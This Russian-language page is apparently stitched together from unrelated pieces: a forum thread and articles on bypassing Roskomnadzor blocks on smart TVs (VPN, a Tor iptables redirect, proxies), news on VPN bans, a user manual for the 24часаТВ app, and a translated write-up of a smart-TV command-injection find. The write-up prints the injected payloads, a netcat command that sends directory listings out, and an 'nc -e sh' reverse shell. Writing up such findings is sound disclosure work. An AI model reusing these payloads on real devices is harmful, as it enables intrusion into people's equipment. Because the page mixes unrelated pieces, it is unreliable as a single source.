24 тв приложение для смарт тв как обойти блокировку
Смарт LG. С рекламой в ютубе смирился, через 5 сек ее можно пропустить, даже мой 4-летний ребенок умеет это. Но вот с чем не хочу мириться - заблокированные ркн-ом сайты, где можно смотреть фильмы и сериалы (те же сайты киного). На компе спасает аддон к браузеру, а как это устроить на смарт тв?
Vpn прям на домашнем роутере завести и завернуть в него заблоченные сайты.быстрее всего засунуть hdmi stick с андроидом, и на нем впн поднять
На роутере tor с transport и в init.d:
iptables -A PREROUTING -t nat -i br0 (у тебя может быть другой интерфейс, смотри ifconfig) -s 10.2.2.20 (айпи тлека) -p tcp -j REDIRECT --to-port 6655 (порт транспарент прокси ТОРа)
и весь трафик телека ходит через ТОР.
Или вообще банально PAC на проксю Роскомсвободы пропиши, их ещё не прикрыли.
Рекламу блокировать куда проще, а обойти ограничения можно только развернув весь трафик на какой-нибудь впн
Мы купили нетбук. Или не нет бук. Блять. Короче. Коробочка, портативный пк.(на фото) и необходимость в поисках решения проблемы с вебос отпала.
Можно установить Puffin браузер. Он через все по умолчанию работает, но на смарт тв теперь работает по подписке.
на роутере, в зависимости от того что за железяка, можно поднять например ovpn или ipsec
Смарт же, поди, на андроиде? Ищите vpn под андроид не дорогой и вперёд..
Мишустин утвердил новые правила идентификации пользователей мессенджеров
Премьер-министр Михаил Мишустин подписал постановление правительства, которым утвердил правила идентификации пользователей мессенджеров. Этот документ пришел на смену постановлению от 27 октября 2018 года №1279, которое теперь утратило силу
Попытка заблокировать сервисы Google обернулась сбоем в работе систем Центробанка РФ
Банк России столкнулся с крупным сбоем своих интернет-систем спустя несколько дней после того, как Роскомнадзор начал предпринимать попытки ограничить работу ряда сервисов Google. Утром 13 сентября начала фиксироваться нестабильная работа личных кабинетов, через которые банки взаимодействуют с ЦБ.
Проблемы сохранились и во вторник, что создало трудности для проведения регулярных операций ЦБ, таких как предоставление рублёвых кредитов и размещение средств на депозитах. Из-за этих трудностей ЦБ даже начал принимать заявки от банков на бумажных носителях и продлил срок их подачи до 20:00 по Москве. Вместе с тем были продлены сроки предоставления других электронных документов, в том числе и отчётности. Официально было заявлено, что трудности связаны с проводимыми техническими работами.
Из-за блокировок DNS-адресов Google и Cloudflare, как сообщается, у некоторых пользователей наблюдаются проблемы с доступом к сайту РЖД, доступ к которому удаётся получить только при помощи VPN, а также к обновлениям iOS.
«Коммерсантъ» узнал о сбоях Avito и Twitch после блокировок VPN-сервисов
Из-за этого игроки могут испытывать сложности со входом в игру или вылетать из нее. Разработчик указал, что связался с провайдерами и решает проблему. Игроков также попросили сообщить своему провайдеру о возникших сбоях.
Роскомнадзор заявил, что во время блокировки VPN-сервисов не блокировал указанные UDP-порты.
Роскомнадзор 3 сентября заблокировал шесть VPN-сервисов: Hola! VPN, ExpressVPN, KeepSolid VPN Unlimited, Nord VPN, Speedify VPN и IPVanish VPN. Их работа признана нарушающей российское законодательство. О начале блокировки VPN-сервисов, которые могут использоваться для доступа к запрещенным в России интернет-ресурсам, Роскомнадзор сообщил в июне. Тогда в черный список попали VyprVPN и Opera VPN.
С 2017 года VPN-сервисы и анонимайзеры обязаны по указанию Роскомнадзора подключаться к Федеральной государственной информационной системе (ФГИС) и ограничивать пользователям доступ к включенным в ее базу запрещенным в России сайтам.
Роскомнадзор пригрозил заблокировать DeviantArt
РКН окончательно закрыл Глаз бога
Начало кампании РКН против VPN
Думаю ни для кого не секрет, что в последнее время РКН все больше закручивает гайки. Пробует разные подходы, начиная от реального замедления определенных ресурсов или же ограничиваясь угрозами замедлить их (привет Twitter и YouTube). Конечно, абсолютное фиаско и унижение, полученное после неудачной попытки блокировать Telegram не прошло бесследно. РКН обиду не забыл, а поэтому методы становятся немного более избирательными, чтобы не рушить чудовищное количество важной инфраструктуры, действуя подобно пушке, стреляющей по воробьям (да, это отсылка про рухнувший Сбербанк и прочее при попытке заблокировать Telegram). Хотя и до сих пор каждую неделю звучат призывы огородить богомерзкие и внезапно ставшими неугодными углы интернета от неустоявшейся психики граждан.
Сейчас, пока изгнанные, но все же хоть как-то технически проинформированные пользователи, заново устанавливают OperaVPN в свой браузер, обычные пользователи остались ни с чем. Не особенно хочется выступать в роли проповедника судного дня, но все же, хотя бы в глубине души, все понимают, за каждым ныне популярным, но не особо продуманным в плане защиты от нападок сервисом, придут. Те, кто умудрился вернуть VPN в свой браузер Opera, просто продлевают агонию, вскоре адреса будут забанены и привет.
Можно подумать так: "Ну что ж, значит возьму те, что с конца списка и буду пользоваться ими". Ну например Hola Free VPN Proxy — он есть в списке. Или хотя бы тот же АнтиЗапрет, что угодно, это все вопрос времени. Да, кроме того что придут и за ними, есть еще один нюанс. В конце концов, все эти решения, придумывались в качестве относительно простого обхода блокировок. Раньше, до определенного момента времени, было достаточно любого прокси, как например самый популярный NL (Голландия) прокси или DE (Германия). Сейчас ситуация еще сильнее ухудшилась. Теперь да же зайдя на некоторые заблокированные сайты, то они не откроется из NL и DE. На rezka.ag многие фильмы не откроются да же через UA (Украина).
Т.е. в данный момент не только нужно найти подходящий прокси сервер через который открывается большинство сайтов, но и для части сайтов держать дополнительные сервера. Думаю не нужно говорить что постоянное переключение между этими проксями и сопровождение этих правил, что-откуда надо открывать, не доставляет особого удовольствия. Хоть даже сейчас существуют бесплатные варианты типа той же Hola, но кто-нибудь пытался смотреть через них какое-нибудь потоковое видео? Нужно признать бесплатные варианты, подходят только для того чтобы почитать статеечки или посмотреть картинки. Но интернет давно уже не текст с картинками, это ролики по 150 а то и 1500 mb, YouTube шагает по планете. Обычные варианты такое уже не вывозят.
Все мы хотим пользоваться интернетом так, как этого заслуживаем в 2021 году, а не так как это существует в анально огороженном Китае. Список VPN-сервисов, которые заблокируют на территории России разослали ещё 18 марта среди сотрудников Сбера, а в публичном доступе письмо всплыло 15 апреля. Информация об этом появилась на форуме ntc.party , где сидят разработчики анти-цензурного софта.
И вот настало сегодня, когда зловещее предупреждение о бане исполнилось, решено, что нет лучше времени чем всем вам начать пользоваться тем, что я изначально создавал для себя и не особо пытался продвигать.
Для Google Chrome и Mozilla Firefox релиз уже есть.
Вот главные условия и приципы:
- База всегда максимально полная — обновление происходит ежедневно. Это очень важно.
- Проксировать только заблокированные сайты, все остальные сайты обязаны работать напрямую. Пропускная способность у меня нерезиновая.
- В век страха быть чипированным и получить Covid-19 от вышек 5G клянусь не собирать данных пользователей, не хранить никаких логов на серверах и не передавать ничего третьим лицам. (А нафиг оно мне надо, место у меня тоже ограничено).
Это решение изначально создавалось и планировалось из расчета на будущее. Естественно, я не буду вдаваться в подробности технического решения, но центр логики заключается в ранжированности доверия к пользователям.
Могу заверить, что изначально все создается так, чтобы не допустить остановки сервиса.
Сегодня пользователи часто сталкиваются с такой ситуацией, что не могут зайти на какой-либо сайт из-за его блокировки в его стране по требованию законодательства, или по причине того, что IP адрес заблокирован на каком-то сайте или находится в черном списке.
В этой статье рассмотрим способы обхода блокировки сайтов, а также способы повышения анонимности интернет-серфинга.
Для обхода блокировки сайтов внутри какой-то страны достаточно обратиться к этому сайту не напрямую, а через узел-посредник, находящийся в любой другой стране, где этот сайт не заблокирован.
Первый способ, самый простой — основан на функции сжатия данных в браузерах. Эта функция используется для выхода в интернет с медленного соединения. На первый взгляд это ничего не меняет, но эта самая функция сжатия происходит на промежуточном сервере, который, как правило, находится не в вашей стране. Таким образом, браузер работает как с прокси-сервером. Этот способ рассмотрим на примере браузера Google Chrome. Если у вас установлен именно этот браузер, то делаем следующее: запускаем его, заходим в настройки приложения, после чего активируем функцию сжатия трафика. Теперь сайты будут ”сжиматься» на серверах Google. Аналогичная функция есть в браузере Opera, который также доступен для систем Андроид, Windows и других платформ.
Второй способ обхода блокировки — установка приложения для создания VPN подключения (Virtual Private Network). Таких приложений есть несколько, их можно легко найти в каталоге приложений Play Market по запросу «VPN». Этот способ меняет маршрутизацию для всего устройства, то есть все приложения на вашем устройстве будут использовать это соединение. Важным преимуществом данного метода является его полная анонимность, весь трафик шифруется у вас на устройстве, и расшифровывается только на конечном узле. В отличие от других методов, даже ваш провайдер не может узнать на какой сайт вы заходите и какие данные к вам и от вас передаются. Как правило, эти сервисы предлагает возможность бесплатного использования, но оно может быть ограничено по времени подключения (нужно переподключать) или в скорости. Платное использование стоит достаточно не дорого.
Третий способ — использовать прокси-серверы. Принцип работы прокси-серверов и VPN очень похож, оба способа основаны на смене IP адреса на IP другой страны (использование промежуточного узла), отличие только в том, что прокси-серверы не шифруют данные, то есть провайдер может видеть ваш трафик, в отличие от VPN, где трафик зашифрован. Плюсом является более высокая скорость работы, так как не нужно кодировать данные, меньше нагрузка на процессор. Для использования прокси-серверов в настройках браузера необходимо указать адрес прокси-сервера, через который вы будете подключаться. Помимо браузеров, указать прокси-сервер для соединения можно во многих других приложениях. Адреса этих серверов могут быть в свободном доступе или можно оплатить сервис. Стоимость этих сервисов значительно ниже, по сравнению с VPN.
Четвертый способ – самый анонимный – использование браузеров, работающих по протоколу TOR. Помимо шифрования трафика по аналогии с VPN, система TOR использует многоузловую маршрутизацию, то есть ваше соединение проходит через несколько посредников. По этой технологии работают например браузеры OrBot и OrFox, для системы Андроид, скачать их можно из Play Market. Аналогичные приложения есть для Windows и других платформ. Минусом данной технологии является неминуемое снижение скорости, что конечно же вряд ли подойдет для комфортного использования, также он годится только для открытия сайтов через указанное приложение, другие приложения на вашем устройстве по прежнему будут иметь тот же IP адрес.
Для запуска приложения просто наведите фокус на иконку приложения "24часаТВ" и запустите его.
После запуска приложения вы окажетесь на экране выбора профиля.
Перед началом пользования вы можете добавить один или несколько профилей, для каждого члена семьи. Для этого нажмите “+”. Удаление профиля - красная клавиша (см.подсказку в правом нижнем углу экрана).
Добавьте один или несколько профилей из списка. Далее, запуская приложение под своим профилем, вы будете видеть на главном экране историю просмотренных именно вами каналов и передач, а также добавлять каналы и передачи в своё “Избранное”.
В детских профилях отображается только контент с возрастным ограничением в пределах 12+
Далее при каждом запуске предложения вам будет предложено выбрать профиль.
Если кроме вас никто не использует приложение на конкретном устройстве, в разделе НАСТРОЙКИ - ОГРАНИЧЕНИЯ - ПРОФИЛЬ ПО УМОЛЧАНИЮ вы можете выбрать профиль, который будет загружаться автоматически.
Наведите фокус на профиль, который собираетесь использовать, нажмите ОК. Вы попадёте на главную страницу приложения.
Основные функции главного экрана:
быстрый доступ к каналам и передачам, которые вы чаще всего смотрите
продолжение просмотра фильмов и передач
Первое, что вы видите на главном экране - это 2 ряда рекомендаций: самые актуальные фильмы, сериалы и передачи? доступные в записи (каталог ТВ-архива) и в каталогах кинотеатров.
Сместив фокус ниже, вы увидите ещё несколько тематических подборок - фильмы, мультфильмы, сериалы, передачи из ТВ-архива и кинотеатров. В зависимости от профиля вы увидите разные рекомендации и тематические подборки. Нажмите на обложку любого фильма или передачи в любой из подборок, чтобы увидеть её описание и доступные выпуски/серии.
Находясь на главной странице, сместите курсор влево (нажимайте "ВЛЕВО" на пульте один или несколько раз для перемещения фокуса). Вы увидите вертикальное меню разделов приложения.
Раздел “Телеканалы”
Первым пунктом будет раздел "Телеканалы", наведите на него курсор и нажмите клавишу Enter (OK).
Перед вами откроется интерфейс выбора категорий, каналов и программ.
Этот же интерфейс появится если в момент просмотра ТВ программ нажать на клавишу ВВЕРХ.
Данное меню разбито на четыре панели:
Список доступных категорий
Список передач по выбранному телеканала
Описание выбранной передачи
В данном интерфейсе доступны следующие действия:
ВЛЕВО/ВПРАВО - Смена панелей
Синяя клавиша на пульте вашего устройства добавляет или удаляет канал в/из категории "Избранное" ( кроме Android)
ОК короткое нажатие - запуск эфира канала (фокус на канале) или открытие карточки с описанием передачи (фокус на названии передачи)
ОК долгое нажатие - меню действий с каналом: добавить в Избранное, удалить из избранного, запустить (в Android)
Клавиши P+/P (CH+/CH-) - позволяют постранично пролистывать большие списки, например список каналов или передач.
Желтым шрифтом выделено название текущего телеканала и передачи
Звездочка напротив названия телеканала говорит о добавлении этого канала в избранное
При выборе интересующей передачи в панели справа будет отображено описание передачи, а также будут доступны две кнопки "Смотреть" и "Серии".
Если нажать клавишу "Смотреть", начнется воспроизведение данной передачи.
Если нажать "Серии", откроется карточка с описанием передачи и списком доступных в архиве выпусков/серий. Также вы можете в любой момент перейти к списку серий (выпусков), нажав клавишу ВНИЗ во время просмотра любого контента.
Вы можете выбрать интересующую вас серию, после чего начнется воспроизведение из той точки архива, которой соответствует выбранная передача.
Далее при просмотре вы можете нажать клавишу OK и увидеть информацию о текущей передаче и подсказки по управлению.
Нажав ВНИЗ (Действия), вы увидите список действий, доступных при просмотре (кроме Android TV и stb, там список действий вызывается долгим нажатием ОК)
Просмотр эфира, управление эфиром
Запуск канала (эфир) - выберите канал в списке, наведите фокус, нажмите ОК
Пауза - дважды ОК
Перемотка - влево/вправо. Остановитесь на нужном кадре и нажмите ОК для просмотра с выбранного места.
Переключение каналов - CH+ / CH- либо P+ / P-, либо выбор канала в списке (нажать ВВЕРХ при просмотре).
Другие опции - ОК, затем ВНИЗ (в Android - долгое нажатие ОК)- переключение звуковой дорожки, изменение масштаба, выбор качества видео.
Избранное
Любой телеканал можно добавить в “Избранное”. Для этого вызовите меню действий (ОК - ВНИЗ при просмотре).
В Android удерживайте нажатой клавишу Enter (OK) до появления соответствующего меню.
Появившееся звездочка напротив названия телеканала говорит о добавлении этого канала в избранное.
Теперь вы можете перейти в категорию "Избранное" и смотреть только любимые телеканалы. Обратите внимание, что в каждом профиле - свой набор избранных каналов.
Аналогичным образом в “Избранное вы можете добавлять и передачи в разделе “ТВ Архив”, и фильмы в кинотеатрах.
Поиск
При выборе в меню главного экрана раздела "Поиск" появится экран поиска.
Поиск осуществляется сразу по всем разделам сервиса (Архив ТВ и каталоги кинотеатров).
По мере ввода поискового запроса в правой части экрана будет отображаться результат поиска.
Выбрав нужный фильм или передачу, вы увидите карточку с её описанием и сериями (выпусками).
ТВ Архив
Находясь на главной странице, нажмите клавишу “ВЛЕВО” , чтобы открылось меню приложения. Выберите раздел “ТВ-архив”.
Выберите интересующую вас категорию (Фильмы/Сериалы/Детям/Передачи/Спорт). Внутри неё выберите интересующий вас жанр и передачу.
На появившемся экране выберите передачу. Нажмите ОК, откроется описание передачи и все её записи и выпуски.
Одна и та же программа/фильм/сериал может быть записана несколько раз, так как идет в разное время на разных каналах. Вы можете выбрать наиболее удобный вариант для просмотра. Например, если фильм шёл несколько раз на канале с рекламой, то выбрав ночную трансляцию, вам, возможно, придётся перематывать меньше рекламы :)
Также при выборе может иметь значение HD или SD версия канала. Если фильм доступен в архиве нескольких каналов, вы можете выбрать тот, который доступен в вашей подписке, или тот, что без рекламы.
После выбора нужной записи начнется воспроизведение. Если вы уже просмотрели часть передачи, вы увидите это и сможете выбрать, продолжить просмотр или начать с начала.
Кинотеатры
Принцип работы с онлайн кинотеатрами такой же, как и с ТВ Архивом. Тем не менее рассмотрим работу с ними на примере AMEDIATEKA.
В главном меню приложения выберите раздел "AMEDIATEKA"
Выберите жанр и сериал
Для просмотра выберите серию либо нажмите кнопку "Смотреть".
Если вы впервые смотрите сериал, начнется воспроизведение первой серии.
Если вы уже начали смотреть сериал, запустится воспроизведение с того места, на котором вы ранее закончили просмотр.
При окончании просмотра текущей серии начинается автоматическое воспроизведении следующей серии. Его можно отключить/включить в настройках приложения - НАСТРОЙКИ - ОСНОВНЫЕ - СЛЕДУЮЩАЯ СЕРИЯ.
Управление просмотром:
ВПРАВО/ВЛЕВО либо клавиши >> / << - перемотка
ОК / ENTER либо || - пауза
Если прервать просмотр серии, то при последующем запуске вам будет предложено продолжить просмотр.
Если сериал доступен с несколькими звуковыми дорожками (например, русский + английский язык), вы увидите подсказку - жёлтую клавишу в правом нижнем углу экрана, нажмите её для выбора дорожки.
Для перехода в настройки необходимо вернуться на экран выбора профиля.
Режим “Только ТВ”
На конкретном устройстве в рамках конкретного профиля вы можете включить режим “Только ТВ”. Он предназначен для пользователей, которым сложно осваивать новые интерфейсы. В данном режиме доступен только просмотр каналов, переключение каналов вперёд-назад и по номерам и переход к списку каналов с категориями (клавиша “вверх”).
Если у вас активирован режим "Только ТВ", нажав BACK (НАЗАД), вы можете перейти в настройки для отключения профиля либо выйти из приложения.
Выбор качества изображения
В разделе НАСТРОЙКИ / ОСНОВНЫЕ доступен выбор качества изображения.
При выборе АВТО на всех каналах вам будет доступен HLS поток с адаптивным битрейтом, оптимальный для нестабильного канала связи.
НАИЛУЧШЕЕ - это оригинальный UDP поток, ХОРОШЕЕ - он же, сжатый до 1.5-4 мбит/с.
НАИЛУЧШЕЕ качество позволяет максимально приблизить качество картинки к исходному качеству сигнала, получаемого со спутника или по наземным каналам связи. Для его корректной работы желательно наличие стабильного интернет-канала 15-30 мбит/с.
В разделе ПОДДЕРЖКА в Android доступна проверка скорости соединения с серверами 24часаТВ, п результатам которой предлагается выбрать подходящий тип потока (качество видео).
Поддержка
При возникновении неполадок, требующих технической диагностики, рекомендуется сфотографировать содержимое раздела “Поддержка” и передать в службу поддержки. Там собрана диагностическая информация. Если вы оплачиваете 24часаТВ через вашего интернет-провайдера, на этой странице вы увидите его контакты для обратной связи.
Другие настройки
При выборе любого пункта меню в настройках вы увидите подсказку с описанием.
Видео-Обзор возможностей сервиса 24часаТВ
Всем, кто дочитал инструкцию до конца - подарок: промо-код USER44LEVEL, открывающий доступ на 3 дня ко всему кино в 24часаТВ (MEGOGO, AMEDIATEKA и киноканалы НАСТРОЙ КИНО). Приятного просмотра!
Это был один из обычных ленивых вечеров, когда я смотрел телевизор после длинного трудового дня.
Автор: Sven Morgenroth
Это был один из обычных ленивых вечеров, когда я смотрел телевизор после длинного трудового дня. Несмотря на то что чувствовалась усталость, я продолжал размышлять об уязвимости, найденной в роутере, который мне одолжил приятель. Нахождение брешей в подобного рода устройствах всегда является забавным мероприятиям, поскольку вскрываются детали, доступные лишь разработчикам и, возможно, службе технической поддержки.
Поскольку на тот момент я был очень уставшим, то намеревался лишь поставить таймер автоматического выключения и прилечь. Однако во время установки таймера меня заинтересовал вопрос, есть ли скрытые функции в меню настроек телевизора, доступные только разработчикам и службе поддержки. После непродолжительных поисков в Гугле в моем мобильном телефоне я обнаружил, что в этой марке телевизоров предусмотрен код, открывающий скрытое меню.
После повторного открытия настроек я ввел код при помощи пульта управления, и в левом стороне экрана появилось еще одно меню. Практически все категории были недоступны. Я смог только активировать режим «Hotel Mode» и посмотреть версию телевизора.
В тот момент мне захотелось получше узнать свой телевизор. Среди настроек была категория «info», открыв которую я увидел другие номера и версии. Затем мое внимание привлекла возможность, позволяющая назначить имя телевизору.
Уязвимость в Smart TV
При работе в сфере информационной безопасности постоянно приходится тестировать полезные нагрузки в различных полях ввода. К примеру, это может быть параметр GET-запроса, используемого веб-интерфейсом роутера, панели управления нового принтера или, как в моем случае, телевизора. Мне показалось, что будет забавно, если у телевизора будет имя «sleep 5».
Рисунок 1: Параметр для назначения имени телевизору
После ввода полезной нагрузки через пульт управления и сохранения результатов, меню с настройками замерло на некоторое время. Когда телевизор вернулся к жизни я изменил значение параметра, чтобы была возможность добраться до других пунктов меню. В тот момент я еще не догадывался, что нашел нечто похожее на уязвимость, связанную с внедрением команд. На самом деле замирание телевизора на несколько секунд после изменения настроек не являлось чем-то странным. Однако задержка на столь долгое время вызвала у меня любопытство.
Время замирания было намного больше чем 5 секунд. Возможно, все дело было в одиночных кавычках, и телевизор, не ожидая подобных входных данных, выдавал ошибку с целью предотвращения загрузки этих символов. Я попытался повторить эксперимент и ввел `sleep 0`. На этот раз все загрузилось моментально.
Происходило нечто не очень понятное, и я решил измерить время ответа в зависимости от значения параметра функции sleep. Выяснилось, что время замирания меню телевизора всегда в три раза дольше, чем значение этого параметра:
- sleep (2) - 6 секунд
- sleep (3) - 9 секунд
- sleep (5) - 15 секунд
Запуск команд в телевизоре
Я не мог поверить, что смог внедрить команду после первой же попытки. Замирание меню не было стопроцентным доказательством и в целом не столь полезно, если мы ведем речь об эксплуатации уязвимости. В моем распоряжении был 31 символ (минус две одинарные кавычки), полезная нагрузка должна быть не более 29 знаков.
Ниже показан список команд, которые я пытался запустить в моем телевизоре. Напротив каждой команды дается пояснение и результат запуска (успешно/неудачно).
Описание
Количество символов
Успешный запуск
which – команда в Linux, возвращающая путь к приложению (если приложение существует)
&& sleep 2 – заморозка меню на 3*2 секунды, если после выполнение команды which найдена утилита nc (в телевизоре)
Проверка, присутствует ли утилита ssh
Оказалось, что присутствует утилита wget
Проверяем, доступен ли файл /etc/passwd на чтение. Оказалось, что да (было бы очень странно, если нет)
Если у нас есть права суперпользователя, файл /etc/shadow доступен на чтение. Проверяем, есть ли у нас права суперпользователя. Однако файл оказался недоступным для чтения.
Получаем объяснение, почему файл /etc/shadow не доступен на чтение. Этого файла не существует.
Далее нужно было подсоединить телевизор к ноутбуку через сетевой кабель, но уже сейчас я был доволен тем, что у меня получалось запускать команды в телевизоре лишь при помощи пульта управления.
Получение доступа к шеллу в телевизоре
Мой телевизор крепится к стене, и подключить сетевой кабель оказалось не так просто, как может показаться на первый взгляд. Преодолев некоторые сложности, мне все же удалось подключить кабель к телевизору с одной стороны и к ноутбуку с другой. Далее при помощи утилиты ipconfig я выяснил IP-адрес ноутбука.
Рисунок 2: Сетевые параметры ноутбука
После выяснения IP-адреса ноутбука мне лишь нужно было организовать обратный шелл. Таким образом, не нужно было знать IP-адрес телевизора. Кроме того, обратный шелл удобен тем, что позволяет обходить любые правила фаервола, которые блокируют входящие соединения. Однако перед тем как начать думать о том, как получить шелл, используя 29 символов, я решил по подробнее изучить систему.
Использование Netcat в телевизоре
Как видно из рисунка выше, права суперпользователя у нас есть. Сей факт не столь примечателен, но тем не менее. Далее мне захотелось узнать содержимое корневой директории / при помощи команды `ls -la /|nc 169.254.56.216 5`.
Рисунок 4: Содержимое корневой директории
Отлично. Однако у меня до сих пор не было полноценного шелла для выполнения команд. Все возможные варианты не проходили проверку на длину и были не слишком полезными. Однако поскольку версия nc, установленная в телевизоре, поддерживала флаг –e, мне удалось организовать обратный шелл при помощи команды `nc 169.254.213.210 5 -e sh`.
Рисунок 5: Обратный шелл для выполнения команд в телевизоре
Теперь, когда у меня был полноценный шелл, я захотел увидеть результаты своей работы на экране телевизора. Здесь существует несколько возможностей. Например, смена логотипа при загрузке или изменение иконок приложений. Поскольку у меня был Smart TV, уже было установлено несколько программ, например, Youtube и Skype.
Рисунок 6: Приложение, предустановленные в телевизоре
Я заметил, что большая часть файловой системы была доступна только для чтения, и мне не удалось поменять логотип. Однако там были часто меняющиеся картинки, например, рамки превью, которые можно наблюдать при переключении каналов телевизора. Эти превью содержат снимки программ, идущих в тот момент, когда мы переходим в канал. Совершенно очевидно, что данные картинки сохраняются в месте, доступным для чтения и записи файлов.
Иконки хранились в файлах .jpg. Для получение полного списка файлов с расширением .jpg я воспользовался командой find / -name *.jpg, однако среди результатов не оказалось файлов, имеющих отношения к картинкам превью. Я проделал тот же самый трюк с файлами .jpg и заметил имена наподобие channelImage123.jpg. После загрузки нужных файлов и замены файлов, в имени которых содержится строка channelImage, я получил следующий результат.
Рисунок 7: Экран телевизора с обновленными картинками
Ваш телевизор не настолько умен, как вы думаете
Устройства, подключенные к интернету, могут иметь уязвимости в самых неожиданных местах. Там, где вы ожидаете меньше всего. Когда я тестировал команду sleep, то даже не мог и представить, что мой трюк сработает. Первоначально я решил провести свой эксперимент от скуки. Кроме того, я понятия не имел, что мой телевизор работает по управлением ОС Linux, и был еще больше удивлен, что найденные бреши пригодны к эксплуатации.
Данную уязвимость нельзя эксплуатировать удаленно, хотя что-то подсказывает мне, что я был прав, когда решил не подключать свой телевизор к интернету и не использовал продвинутые функции слишком часто. Я бы не ощущал себя комфортно с мыслью о том, что кто-то может управлять моим телевизором.
Предполагаю, что существует более интересные методы и бреши, пригодные для эксплуатации. Однако, думаю, не стоит добавлять седых волос в том момент, когда телевизор замирает, и ты думаешь, вышло ли устройство из строя или нет. В конце концов, телевизор предназначен для расслабления, а не для повышения кровяного давления, за исключением тех случаев, когда вы смотрите спортивные мероприятия. Например, футбол.
Читайте также: